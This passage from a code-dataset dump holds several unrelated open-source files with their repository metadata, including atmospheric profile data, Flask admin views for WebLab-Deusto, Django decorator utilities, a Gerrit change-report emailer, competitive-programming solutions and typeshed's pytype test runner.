238.968, 234.894, 232.906, 229.919, 226.865, 224.546,
223.304, 222.7 , 223.263, 223.76 , 221.243, 218.834,
216.745, 214.724, 212.733, 210.802, 209.159, 207.665,
206.16 , 204.582, 203.048, 200.011, 196.896, 194.45 ,
192.73 , 191.145, 193.967, 196.723, 199.161, 201.357,
203.588, 206.319, 208.992, 211.874, 214.808, 217.411,
219.322, 221.195, 223.676, 226.172, 230.264, 235.587,
239.854, 240.822, 241.772, 243.613, 245.492, 247.817,
250.353, 252.693, 254.779, 256.778, 258.546, 260.285,
261.97 , 263.628, 265.182, 266.706, 268.272, 269.821,
271.562, 273.297, 275.39 , 277.511, 279.901, 281.829,
283.132, 284.507, 285.898, 287.291, 288.692, 290.073,
291.423, 292.803, 294.252, 295.567, 296.707, 297.862,
299.18 , 300.86 , 300.86 , 300.86 , 300.86 ])
self["O3"] = numpy.array([ 5.01755700e-02, 1.15813100e-01, 2.47679900e-01,
4.75340700e-01, 9.45566100e-01, 1.46851900e+00,
1.87795000e+00, 2.17465400e+00, 2.43277600e+00,
2.92066800e+00, 3.57626700e+00, 4.40444000e+00,
5.45986700e+00, 6.33738900e+00, 7.10775900e+00,
7.82629700e+00, 8.43338300e+00, 8.94155800e+00,
9.35094900e+00, 9.64592600e+00, 9.70494000e+00,
9.62606900e+00, 9.43127400e+00, 9.00999400e+00,
8.35107300e+00, 7.56506600e+00, 6.81864500e+00,
6.09690800e+00, 5.33800900e+00, 4.59311800e+00,
3.73551900e+00, 2.90568800e+00, 2.18988100e+00,
1.49945100e+00, 1.05707600e+00, 7.27611500e-01,
4.60667100e-01, 3.12258400e-01, 1.67879100e-01,
1.23013600e-01, 8.91367700e-02, 7.08934100e-02,
6.97595400e-02, 6.86654900e-02, 6.81548200e-02,
6.76556200e-02, 6.54202300e-02, 6.19483600e-02,
5.86753800e-02, 5.62659800e-02, 5.39084300e-02,
5.14477100e-02, 4.89749200e-02, 4.62010700e-02,
4.26514900e-02, 3.91723600e-02, 3.73109700e-02,
3.56372300e-02, 3.45162900e-02, 3.38305000e-02,
3.31925400e-02, 3.26846700e-02, 3.21860900e-02,
3.17491200e-02, 3.13242300e-02, 3.09235200e-02,
3.05388900e-02, 3.01843900e-02, 2.98684600e-02,
2.95764800e-02, 2.93577500e-02, 2.91488800e-02,
2.90530000e-02, 2.89587700e-02, 2.90996900e-02,
2.92517800e-02, 2.96474400e-02, 3.00649500e-02,
3.06183500e-02, 3.11761600e-02, 3.16856500e-02,
3.21589500e-02, 3.24871200e-02, 3.27531600e-02,
3.29365300e-02, 3.29429600e-02, 3.28500800e-02,
3.25754900e-02, 3.20801900e-02, 3.13033800e-02,
3.01042200e-02, 2.82785300e-02, 2.58376700e-02,
2.26970500e-02, 1.84285000e-02, 1.32521800e-02,
7.32499400e-03, 3.38092700e-03, 3.38431400e-03,
3.38756600e-03, 3.39069000e-03])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 300.86
self["S2M"]["Q"] = 35766.26576
self["S2M"]["O"] = 0.00338028981898
self["S2M"]["P"] = 1008.79
self["S2M"]["U"] = -2.07465
self["S2M"]["V"] = -6.63631
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 1
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 302.671
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 50.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -8.40953
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([1993, 5, 1])
self["TIME"] = numpy.array([12, 0, 0])
| [
"[email protected]"
]
| |
307afce7174d1f60914d4a08060660c34b82e628 | 794be26e4ab7bdd9af017ce1d0c6ce1f087d968d | /functional_tests/test_create.py | b0b5e0c8678060723a0834273615afdbe0ad3866 | [
"Apache-2.0",
"LGPL-3.0-only"
]
| permissive | jasinner/elliott | 02fcc2f67b56d4e16eef28f0323d276fbd954593 | 67d77913517d0f7954dc02d918eb96ba78ec1ea8 | refs/heads/master | 2021-06-18T19:59:45.878716 | 2021-04-29T21:33:51 | 2021-04-29T21:33:51 | 215,217,286 | 0 | 0 | Apache-2.0 | 2019-10-15T05:52:13 | 2019-10-15T05:52:13 | null | UTF-8 | Python | false | false | 662 | py | from __future__ import absolute_import, print_function, unicode_literals
import unittest
import subprocess
from functional_tests import constants
class GreateTestCase(unittest.TestCase):
def test_create_rhba(self):
out = subprocess.check_output(
constants.ELLIOTT_CMD
+ [
"--group=openshift-4.2", "create", "--type=RHBA", "--impetus=standard", "--kind=rpm",
"--date=2020-Jan-1", "[email protected]", "[email protected]", "[email protected]"
]
)
self.assertIn("Would have created advisory:", out.decode("utf-8"))
| [
"[email protected]"
]
| |
38f612204aaf7a5bb92d2ddfc8514649d07bdcad | a73cc710aa370be94b70248f2268d9c3b14059d0 | /server/src/weblab/core/web/quickadmin.py | 1fba2f6ba62d2380539e03e37e0669230626b289 | [
"BSD-3-Clause",
"BSD-2-Clause"
]
| permissive | weblabdeusto/weblabdeusto | 05692d4cc0a36287191544551d4a1113b3d95164 | 62e488afac04242a68efa4eb09fd91d7e999d4dd | refs/heads/master | 2023-05-10T23:14:05.407266 | 2022-08-31T14:16:23 | 2022-08-31T14:16:23 | 5,719,299 | 19 | 23 | BSD-2-Clause | 2023-05-01T20:18:53 | 2012-09-07T16:24:03 | Python | UTF-8 | Python | false | false | 7,417 | py | from __future__ import print_function, unicode_literals
import datetime
import calendar
from flask import render_template, request, send_file, Response, url_for
from functools import wraps, partial
from weblab.core.web import weblab_api
from weblab.core.db import UsesQueryParams
def check_credentials(func):
@wraps(func)
def wrapper(*args, **kwargs):
expected_token = weblab_api.config.get('quickadmin_token', None)
if expected_token:
token = request.args.get('token')
if not token:
return Response("You must provide a token like ?token=something")
if token != expected_token:
return Response("Invalid token")
return func(*args, **kwargs)
return wrapper
def get_url_for():
existing_args = dict(request.args)
existing_args.pop('page', None)
my_url_for = partial(url_for, **existing_args)
if 'token' in request.args:
return partial(my_url_for, token = request.args['token'])
return my_url_for
def create_query_params(**kwargs):
params = {}
for potential_arg in 'login', 'experiment_name', 'category_name', 'ip', 'country':
if potential_arg in request.args:
params[potential_arg] = request.args[potential_arg]
for potential_arg in 'start_date', 'end_date':
if potential_arg in request.args:
try:
params[potential_arg] = datetime.datetime.strptime(request.args[potential_arg], "%Y-%m-%d").date()
except ValueError:
pass
for potential_arg in 'page',:
if potential_arg in request.args:
try:
params[potential_arg] = int(request.args[potential_arg])
except ValueError:
pass
if 'page' not in params or params['page'] <= 0:
params['page'] = 1
for potential_arg in 'date_precision',:
if potential_arg in request.args:
if request.args[potential_arg] in ('day', 'month', 'year', 'week'):
params[potential_arg] = request.args[potential_arg]
if 'date_precision' not in params:
params['date_precision'] = 'month'
params.update(kwargs)
query_params = UsesQueryParams(**params)
metadata = weblab_api.db.quickadmin_uses_metadata(query_params)
params['count'] = metadata['count']
if 'start_date' in params:
params['min_date'] = params['start_date']
else:
params['min_date'] = metadata['min_date']
if 'end_date' in params:
params['max_date'] = params['end_date']
else:
params['max_date'] = metadata['max_date']
return UsesQueryParams(**params)
@weblab_api.route_web('/quickadmin/')
@check_credentials
def index():
return render_template("quickadmin/index.html", url_for = get_url_for())
LIMIT = 20
@weblab_api.route_web('/quickadmin/uses')
@check_credentials
def uses():
query_params = create_query_params()
uses = weblab_api.db.quickadmin_uses(LIMIT, query_params)
return render_template("quickadmin/uses.html", limit = LIMIT, uses = uses, filters = query_params.filterdict(), arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Uses', endpoint = '.uses')
@weblab_api.route_web('/quickadmin/use/<int:use_id>')
@check_credentials
def use(use_id):
return render_template("quickadmin/use.html", param_url_for = get_url_for(), **weblab_api.db.quickadmin_use(use_id = use_id))
@weblab_api.route_web('/quickadmin/file/<int:file_id>')
@check_credentials
def file(file_id):
file_path = weblab_api.db.quickadmin_filepath(file_id = file_id)
if file_path is None:
return "File not found", 404
return send_file(file_path, as_attachment = True)
@weblab_api.route_web('/quickadmin/uses/map')
@check_credentials
def uses_map():
query_params = create_query_params()
per_country = weblab_api.db.quickadmin_uses_per_country(query_params)
per_time = _per_country_by_to_d3(weblab_api.db.quickadmin_uses_per_country_by(query_params))
return render_template("quickadmin/uses_map.html", per_country = per_country, per_time = per_time, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Uses map', endpoint = '.uses_map')
@weblab_api.route_web('/quickadmin/demos')
@check_credentials
def demos():
group_names = weblab_api.config.get_value('login_default_groups_for_external_users', [])
query_params = create_query_params(group_names = group_names)
uses = weblab_api.db.quickadmin_uses(LIMIT, query_params)
return render_template("quickadmin/uses.html", limit = LIMIT, uses = uses, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Demo uses', endpoint = '.demos')
@weblab_api.route_web('/quickadmin/demos/map')
@check_credentials
def demos_map():
group_names = weblab_api.config.get_value('login_default_groups_for_external_users', [])
query_params = create_query_params(group_names = group_names)
per_country = weblab_api.db.quickadmin_uses_per_country(query_params)
per_time = _per_country_by_to_d3(weblab_api.db.quickadmin_uses_per_country_by(query_params))
return render_template("quickadmin/uses_map.html", per_country = per_country, per_time = per_time, arguments = query_params.pubdict(), param_url_for = get_url_for(), title = 'Demo uses map', endpoint = '.demos_map')
def _per_country_by_to_d3(per_time):
new_per_time = [
# {
# key : country,
# values : [
# [
# time_in_milliseconds,
# value
# ]
# ]
# }
]
total_per_country = [
# (country, number)
]
for country in per_time:
total_per_country.append( (country, sum([ value for key, value in per_time[country] ]) ))
total_per_country.sort(lambda x, y: cmp(x[1], y[1]), reverse = True)
top_countries = [ country for country, value in total_per_country[:10] ]
max_value = max([value for country, value in total_per_country[:10] ] or [0])
key_used = 'month'
times_in_millis = {
# millis : datetime
}
for country in top_countries:
for key in [ key for key, value in per_time[country] ]:
if len(key) == 1:
if isinstance(key[0], datetime.date):
key_used = 'day'
date_key = key[0]
else:
key_used = 'year'
date_key = datetime.date(year = key[0], month = 1, day = 1)
elif len(key) == 2:
key_used = 'month'
date_key = datetime.date(year = key[0], month = key[1], day = 1)
else:
continue
time_in_millis = calendar.timegm(date_key.timetuple()) * 1000
times_in_millis[time_in_millis] = key
for country in per_time:
if country not in top_countries:
continue
country_data = {'key' : country, 'values' : []}
country_time_data = dict(per_time[country])
for time_in_millis in sorted(times_in_millis):
key = times_in_millis[time_in_millis]
value = country_time_data.get(key, 0)
country_data['values'].append([time_in_millis, value])
new_per_time.append(country_data)
return { 'key_used' : key_used, 'per_time' : new_per_time, 'max_value' : max_value}
| [
"[email protected]"
]
| |
a463d23256ed3b7f0178434ea5256ff915ef0430 | 4bb1a23a62bf6dc83a107d4da8daefd9b383fc99 | /work/abc034_d2.py | 4afb3860d7f983c4de267f774fec7425d98c023d | []
| no_license | takushi-m/atcoder-work | 0aeea397c85173318497e08cb849efd459a9f6b6 | f6769f0be9c085bde88129a1e9205fb817bb556a | refs/heads/master | 2021-09-24T16:52:58.752112 | 2021-09-11T14:17:10 | 2021-09-11T14:17:10 | 144,509,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | n,k = map(int, input().split())
wpl = [list(map(int, input().split())) for _ in range(n)]
def f(w,p,x):
p = p/100
return p*w - w*x
def check(x):
l = [f(wpl[i][0], wpl[i][1], x) for i in range(n)]
l.sort(reverse=True)
return sum(l[:k])>=0
ok = 0
ng = 1
while abs(ng-ok)>10**-7:
mid = (ok+ng)/2
if check(mid):
ok = mid
else:
ng = mid
print(ok*100) | [
"[email protected]"
]
| |
061e1a704629d8949be1743454ac0c89316349fb | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/agc025/C/2618079.py | c2927f9e67892662b56299b7a9fff478e70376c2 | []
| no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | n = int(input())
l = []
r = []
for i in range(n):
lt, rt = map(int,input().split())
l.append(lt)
r.append(rt)
l.append(0)
r.append(0)
l.sort()
r.sort()
l.reverse()
ans = 0
i = 0
while r[i]<l[i]:
ans += 2*(l[i] - r[i])
i+=1
print(ans) | [
"[email protected]"
]
| |
594eaa6cce6464e3ce1165188820b67175525a11 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /opsworks_write_f/rds-db-instance_update.py | 3257b4557a10fe6a781cb6c9086bdfa3b85a8b86 | []
| no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
deregister-rds-db-instance : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/deregister-rds-db-instance.html
describe-rds-db-instances : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/describe-rds-db-instances.html
register-rds-db-instance : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/opsworks/register-rds-db-instance.html
"""
write_parameter("opsworks", "update-rds-db-instance") | [
"[email protected]"
]
| |
766973ba9748fa74c5378e42398721badd887cf3 | 2612f336d667a087823234daf946f09b40d8ca3d | /python/lib/Lib/site-packages/django/utils/decorators.py | 17f2ea30b337f624c0f984698e31aebbb19f6d37 | [
"Apache-2.0"
]
| permissive | tnorbye/intellij-community | df7f181861fc5c551c02c73df3b00b70ab2dd589 | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | refs/heads/master | 2021-04-06T06:57:57.974599 | 2018-03-13T17:37:00 | 2018-03-13T17:37:00 | 125,079,130 | 2 | 0 | Apache-2.0 | 2018-03-13T16:09:41 | 2018-03-13T16:09:41 | null | UTF-8 | Python | false | false | 4,290 | py | "Functions that help with dynamically creating decorators for views."
try:
from functools import wraps, update_wrapper, WRAPPER_ASSIGNMENTS
except ImportError:
from django.utils.functional import wraps, update_wrapper, WRAPPER_ASSIGNMENTS # Python 2.4 fallback.
class classonlymethod(classmethod):
def __get__(self, instance, owner):
if instance is not None:
raise AttributeError("This method is available only on the view class.")
return super(classonlymethod, self).__get__(instance, owner)
def method_decorator(decorator):
"""
Converts a function decorator into a method decorator
"""
# 'func' is a function at the time it is passed to _dec, but will eventually
# be a method of the class it is defined it.
def _dec(func):
def _wrapper(self, *args, **kwargs):
@decorator
def bound_func(*args2, **kwargs2):
return func(self, *args2, **kwargs2)
# bound_func has the signature that 'decorator' expects i.e. no
# 'self' argument, but it is a closure over self so it can call
# 'func' correctly.
return bound_func(*args, **kwargs)
# In case 'decorator' adds attributes to the function it decorates, we
# want to copy those. We don't have access to bound_func in this scope,
# but we can cheat by using it on a dummy function.
@decorator
def dummy(*args, **kwargs):
pass
update_wrapper(_wrapper, dummy)
# Need to preserve any existing attributes of 'func', including the name.
update_wrapper(_wrapper, func)
return _wrapper
update_wrapper(_dec, decorator)
# Change the name to aid debugging.
_dec.__name__ = 'method_decorator(%s)' % decorator.__name__
return _dec
def decorator_from_middleware_with_args(middleware_class):
"""
Like decorator_from_middleware, but returns a function
that accepts the arguments to be passed to the middleware_class.
Use like::
cache_page = decorator_from_middleware_with_args(CacheMiddleware)
# ...
@cache_page(3600)
def my_view(request):
# ...
"""
return make_middleware_decorator(middleware_class)
def decorator_from_middleware(middleware_class):
"""
Given a middleware class (not an instance), returns a view decorator. This
lets you use middleware functionality on a per-view basis. The middleware
is created with no params passed.
"""
return make_middleware_decorator(middleware_class)()
def available_attrs(fn):
"""
Return the list of functools-wrappable attributes on a callable.
This is required as a workaround for http://bugs.python.org/issue3445.
"""
return tuple(a for a in WRAPPER_ASSIGNMENTS if hasattr(fn, a))
def make_middleware_decorator(middleware_class):
def _make_decorator(*m_args, **m_kwargs):
middleware = middleware_class(*m_args, **m_kwargs)
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if hasattr(middleware, 'process_request'):
result = middleware.process_request(request)
if result is not None:
return result
if hasattr(middleware, 'process_view'):
result = middleware.process_view(request, view_func, args, kwargs)
if result is not None:
return result
try:
response = view_func(request, *args, **kwargs)
except Exception, e:
if hasattr(middleware, 'process_exception'):
result = middleware.process_exception(request, e)
if result is not None:
return result
raise
if hasattr(middleware, 'process_response'):
result = middleware.process_response(request, response)
if result is not None:
return result
return response
return wraps(view_func, assigned=available_attrs(view_func))(_wrapped_view)
return _decorator
return _make_decorator
| [
"[email protected]"
]
| |
e1a24bee538f55419b12446f7f37bc4f25bc8e38 | 03c8d75d11dd34a253d265ce5b44bf7984311bab | /root2yoda | ddf417c19d865e0e7c684d83a4ebafd3e9738188 | []
| no_license | raggleton/QGAnalysisRIVET | e8a57fbfa1380e1c67365b0d5a944119f715813b | 0703bdf81bf27f5fc91d8eedb6e44651d978749a | refs/heads/master | 2021-06-08T19:29:53.683282 | 2021-04-06T07:22:56 | 2021-04-06T07:22:56 | 142,179,672 | 0 | 1 | null | 2020-11-03T17:19:58 | 2018-07-24T15:40:48 | Gnuplot | UTF-8 | Python | false | false | 1,656 | #! /usr/bin/env python
"""\
%prog rootfile [yodafile]
Convert a ROOT data file to the YODA data format.
"""
import yoda, os, sys, optparse
from yoda.script_helpers import parse_x2y_args, filter_aos
parser = optparse.OptionParser(usage=__doc__)
parser.add_option("-m", "--match", dest="MATCH", metavar="PATT", default=None,
help="Only write out histograms whose path matches this regex")
parser.add_option("-M", "--unmatch", dest="UNMATCH", metavar="PATT", default=None,
help="Exclude histograms whose path matches this regex")
opts, args = parser.parse_args()
in_out = parse_x2y_args(args, ".root", ".yoda")
if not in_out:
sys.stderr.write("You must specify the ROOT and YODA file names\n")
sys.exit(1)
import ROOT
for i, o in in_out:
print "opening", i
rf = ROOT.TFile(i)
rootobjects_raw = list(yoda.root.getall(rf))
rootobjects = [(path, ro) for (path, ro) in rootobjects_raw if not isinstance(ro, ROOT.TH1F)]
th1f = [(path, ro) for (path, ro) in rootobjects_raw if isinstance(ro, ROOT.TH1F)]
print rootobjects
print th1f
# Conversion of TH1F into TH1D
for path, ro in th1f:
temp = ROOT.TH1D()
ro.Copy(temp)
rootobjects.append((path, temp))
def to_yoda(path, ro):
print path, ro
ao = yoda.root.to_yoda(ro)
ao.path = path
return ao
analysisobjects = [to_yoda(path, ro) for (path, ro) in rootobjects]
rf.Close()
analysisobjects = [ao for ao in analysisobjects if ao is not None]
filter_aos(analysisobjects, opts.MATCH, opts.UNMATCH)
yoda.writeYODA(analysisobjects, o)
| [
"[email protected]"
]
| ||
e0b51af08de583fc6d2449bff3c69e61e59ce414 | 3f3f2b3eaab992d3cc8f49fcd03e4824a11fddab | /diamond.releng.jenkins/job.scripts/email_owners_of_submittable_changes.py | 7bfd821419fa2722938f0131ed624a2ce5f2ba3e | []
| no_license | DiamondLightSource/diamond-releng | 7bff1926e3fd2f9df3c056d8af5521b4e74aaf41 | ba15336e7f7d3c160d3c3bc28316817cb4585305 | refs/heads/master | 2021-01-25T03:19:25.403769 | 2019-01-02T16:05:28 | 2019-01-02T16:05:28 | 19,986,689 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,159 | py | #!/usr/bin/env python3
###
### Requires Python 3
###
'''
Identify Gerrit changes that are ready to submit, and email the owners
'''
from email.message import EmailMessage
from email.headerregistry import Address
import datetime
import itertools
import json
import logging
import operator
import os
import os.path
import smtplib
import stat
import sys
import time
import urllib.request
import urllib.parse
import urllib.error
GERRIT_HOST = 'gerrit.diamond.ac.uk'
# define module-wide logging
logger = logging.getLogger(__name__)
def setup_logging():
formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S")
# create console handler
logging_console_handler = logging.StreamHandler()
logging_console_handler.setFormatter(formatter)
logger.addHandler(logging_console_handler)
logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
class SubmittableChangesProcessor():
def __init__(self):
setup_logging()
self.logger = logger
self.gerrit_url_base = 'https://' + GERRIT_HOST + '/' # when using the REST API, this is the base URL to use
self.gerrit_url_browser = self.gerrit_url_base # when generating links, this is the base URL to use
# since the Gerrit REST API has been secured, then we need to use basic authentication
self.gerrit_url_base += 'a/'
handler = urllib2.HTTPBasicAuthHandler()
handler.add_password('Gerrit Code Review', self.gerrit_url_base, *self.get_gerrit_http_username_password())
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
@staticmethod
def get_gerrit_http_username_password():
''' the token required to authenticate to Gerrit is stored in a file
the file, in addition to comment and empty lines, contains a single line of the format
username:password
'''
token_filename = os.path.abspath(os.path.expanduser('~/passwords/http-password_Gerrit_for-REST.txt'))
assert os.path.isfile(token_filename)
assert os.stat(token_filename).st_mode == stat.S_IRUSR + stat.S_IFREG # permissions must be user-read + regular-file
last_nonempty_line = ''
with open(token_filename, 'r') as token_file:
for line in token_file: # standard OS terminator is converted to \n
line = line.rstrip('\n') # remove trailing newline
if line:
last_nonempty_line = line
if last_nonempty_line:
return last_nonempty_line.split(':', 1)
raise Exception('File %s appears empty' % token_filename)
def gerrit_REST_api(self, relative_url, accept404=False):
''' Call the Gerrit REST API
'''
url = self.gerrit_url_base + relative_url
request = urllib.request.Request(url, headers={'Accept': 'application/json', 'Accept-Charset': 'utf-8'}) # header specifies compact json, which is more efficient
self.logger.debug('gerrit_REST_api retrieving: %s' % (url,))
try:
rest_json = urllib.request.urlopen(request).read()
except (urllib.error.HTTPError) as err:
if accept404 and (err.code == 404):
self.logger.debug('Invalid response from Gerrit server reading %s: %s' % (url, err))
return None
self.logger.critical('Invalid response from Gerrit server reading %s: %s' % (url, err))
return None
gerrit_magic_prefix_line = b")]}'\n"
if not rest_json[:len(gerrit_magic_prefix_line)] == gerrit_magic_prefix_line:
self.logger.critical('Invalid response from Gerrit server reading %s: magic prefix line not found' % (url,))
return None
standard_json = json.loads(rest_json[len(gerrit_magic_prefix_line):].decode('utf-8')) # strip off the magic prefix line returned by Gerrit
# self.logger.debug(json.dumps(standard_json, indent=2))
return standard_json
def get_submittable_changes_from_gerrit(self):
''' Queries Gerrit to get a list of ChangeInfo records for the changes that can be submitted
'''
url = 'changes/?q=%s&o=CURRENT_REVISION&o=DETAILED_ACCOUNTS' % (urllib.parse.quote('is:open label:Code-Review+2 label:Verified+1 NOT label:Code-Review-2 NOT label:Verified-1'),)
changeinfos = self.gerrit_REST_api(url)
longest_string = {}
longest_string['_number'] = max(itertools.chain((len(str(ci['_number'])) for ci in changeinfos), (len('Change'),)))
longest_string['project'] = max(itertools.chain((len(ci['project']) for ci in changeinfos), (len('Project'),)))
longest_string['branch'] = max(itertools.chain((len(ci['branch']) for ci in changeinfos), (len('Branch'),)))
longest_string['owner'] = max(itertools.chain((len(ci['owner']['name']) for ci in changeinfos), (len('Owner'),)))
format = ('%' + str(longest_string['_number']) + 's ' +
'%-' + str(longest_string['project']) + 's ' +
'%-' + str(longest_string['branch']) + 's ' +
'%-' + str(longest_string['owner']) + 's ' +
'%-16s ' + # for the time last updated
'%s\n') # for the subject
emails = set()
report = format % ('Change', 'Project', 'Branch', 'Owner', 'Updated', 'Subject')
# use a sort key that transforms [email protected] to lastname.firstname
for ci in sorted(changeinfos, key=lambda ci:
'.'.join(operator.itemgetter(2,0)(ci['owner']['email'].partition('@')[0].lower().partition('.'))) +
os.path.basename(ci['project'])): # there can be multiple changeinfos
report += format % (ci['_number'], ci['project'], ci['branch'], ci['owner']['name'], ci['updated'][:16], ci['subject'])
emails.add(ci['owner']['email'])
self.emails = sorted(emails)
self.report = report
return
def make_email(self):
body = 'Below is a list of changes in Gerrit that have been verified and reviewed, but are still waiting for the change owner to submit them' + \
', as of ' + time.strftime("%a, %Y/%m/%d %H:%M:%S %Z") + '.\n'
body += '''
PLEASE CONSIDER EITHER:
Submit your change, it you still want it
Abandon your change, if it is no longer required
'''
body += self.report
body += '\n<<end report>>\n'
# we are going to create an email message with ASCII characters, so convert any non-ASCII ones
# note that this is really a hack, we should be smarter about constructing an email message
body = body.replace("’", "'").replace('“', '"').replace('”', '"')
message = EmailMessage()
message['Subject'] = 'Report on Gerrit changes waiting for the owner to submit'
message['From'] = Address('Jenkins Build Server (Diamond Light Source)', '[email protected]')
message['List-Id'] = 'Gerrit awaiting submit <gerrit-awaiting-submit.jenkins.diamond.ac.uk>'
# use a sort key that transforms [email protected] to lastname.firstname
message['To'] = [Address(addr_spec=committer) for committer in sorted(
self.emails,
key=lambda email_addr: '.'.join(operator.itemgetter(2,0)(email_addr.partition('@')[0].lower().partition('.')))
) if '@' in committer]
message['CC'] = ('[email protected]',)
message.set_content(body)
email_expires_days = 5
if email_expires_days:
message['Expiry-Date'] = (datetime.datetime.utcnow() + datetime.timedelta(days=email_expires_days)).strftime("%a, %d %b %Y %H:%M:%S +0000")
self.logger.info("Sending email ...")
with smtplib.SMTP('localhost') as smtp:
smtp.send_message(message)
return message
if __name__ == '__main__':
scp = SubmittableChangesProcessor()
scp.get_submittable_changes_from_gerrit()
message = scp.make_email()
print(message)
sys.exit(0)
| [
"[email protected]"
]
| |
44a16f28b318d131dbeefaf200012cfa5e1bd8de | 3395a234e7c80d011607e79c49cd48bf516f256b | /dependencies/jedi/third_party/typeshed/tests/pytype_test.py | ee7ac0bb9cb9d9175b955f913e9188cc8bbc75a2 | [
"MIT",
"Apache-2.0"
]
| permissive | srusskih/SublimeJEDI | 67329b72e184bc9584843968dcc534a002c797a1 | 95c185d778425c04536d53517b0e3fe6dedf8e59 | refs/heads/master | 2023-08-24T11:30:37.801834 | 2022-08-30T09:04:17 | 2022-08-30T09:04:17 | 6,241,108 | 669 | 125 | MIT | 2022-08-30T09:04:18 | 2012-10-16T08:23:57 | Python | UTF-8 | Python | false | false | 7,915 | py | #!/usr/bin/env python3
"""Test runner for typeshed.
Depends on pytype being installed.
If pytype is installed:
1. For every pyi, do nothing if it is in pytype_blacklist.txt.
2. Otherwise, call 'pytype.io.parse_pyi'.
Option two will load the file and all the builtins, typeshed dependencies. This
will also discover incorrect usage of imported modules.
"""
import argparse
import itertools
import os
import re
import subprocess
import traceback
from typing import List, Match, Optional, Sequence, Tuple
from pytype import config as pytype_config, io as pytype_io
TYPESHED_SUBDIRS = ["stdlib", "third_party"]
TYPESHED_HOME = "TYPESHED_HOME"
UNSET = object() # marker for tracking the TYPESHED_HOME environment variable
def main() -> None:
args = create_parser().parse_args()
typeshed_location = args.typeshed_location or os.getcwd()
subdir_paths = [os.path.join(typeshed_location, d) for d in TYPESHED_SUBDIRS]
check_subdirs_discoverable(subdir_paths)
check_python_exes_runnable(python27_exe_arg=args.python27_exe, python36_exe_arg=args.python36_exe)
files_to_test = determine_files_to_test(typeshed_location=typeshed_location, subdir_paths=subdir_paths)
run_all_tests(
files_to_test=files_to_test,
typeshed_location=typeshed_location,
python27_exe=args.python27_exe,
python36_exe=args.python36_exe,
print_stderr=args.print_stderr,
dry_run=args.dry_run,
)
def create_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(description="Pytype/typeshed tests.")
parser.add_argument("-n", "--dry-run", action="store_true", default=False, help="Don't actually run tests")
# Default to '' so that symlinking typeshed subdirs in cwd will work.
parser.add_argument("--typeshed-location", type=str, default="", help="Path to typeshed installation.")
# Set to true to print a stack trace every time an exception is thrown.
parser.add_argument(
"--print-stderr", action="store_true", default=False, help="Print stderr every time an error is encountered."
)
# We need to invoke python2.7 and 3.6.
parser.add_argument("--python27-exe", type=str, default="python2.7", help="Path to a python 2.7 interpreter.")
parser.add_argument("--python36-exe", type=str, default="python3.6", help="Path to a python 3.6 interpreter.")
return parser
class PathMatcher:
def __init__(self, patterns: Sequence[str]) -> None:
self.matcher = re.compile(r"({})$".format("|".join(patterns))) if patterns else None
def search(self, path: str) -> Optional[Match[str]]:
if not self.matcher:
return None
return self.matcher.search(path)
def load_blacklist(typeshed_location: str) -> List[str]:
filename = os.path.join(typeshed_location, "tests", "pytype_blacklist.txt")
skip_re = re.compile(r"^\s*([^\s#]+)\s*(?:#.*)?$")
skip = []
with open(filename) as f:
for line in f:
skip_match = skip_re.match(line)
if skip_match:
skip.append(skip_match.group(1))
return skip
def run_pytype(*, filename: str, python_version: str, python_exe: str, typeshed_location: str) -> Optional[str]:
"""Runs pytype, returning the stderr if any."""
options = pytype_config.Options.create(
filename,
module_name=_get_module_name(filename),
parse_pyi=True,
python_version=python_version,
python_exe=python_exe)
old_typeshed_home = os.environ.get(TYPESHED_HOME, UNSET)
os.environ[TYPESHED_HOME] = typeshed_location
try:
pytype_io.parse_pyi(options)
except Exception:
stderr = traceback.format_exc()
else:
stderr = None
if old_typeshed_home is UNSET:
del os.environ[TYPESHED_HOME]
else:
os.environ[TYPESHED_HOME] = old_typeshed_home
return stderr
def _get_relative(filename: str) -> str:
top = 0
for d in TYPESHED_SUBDIRS:
try:
top = filename.index(d)
except ValueError:
continue
else:
break
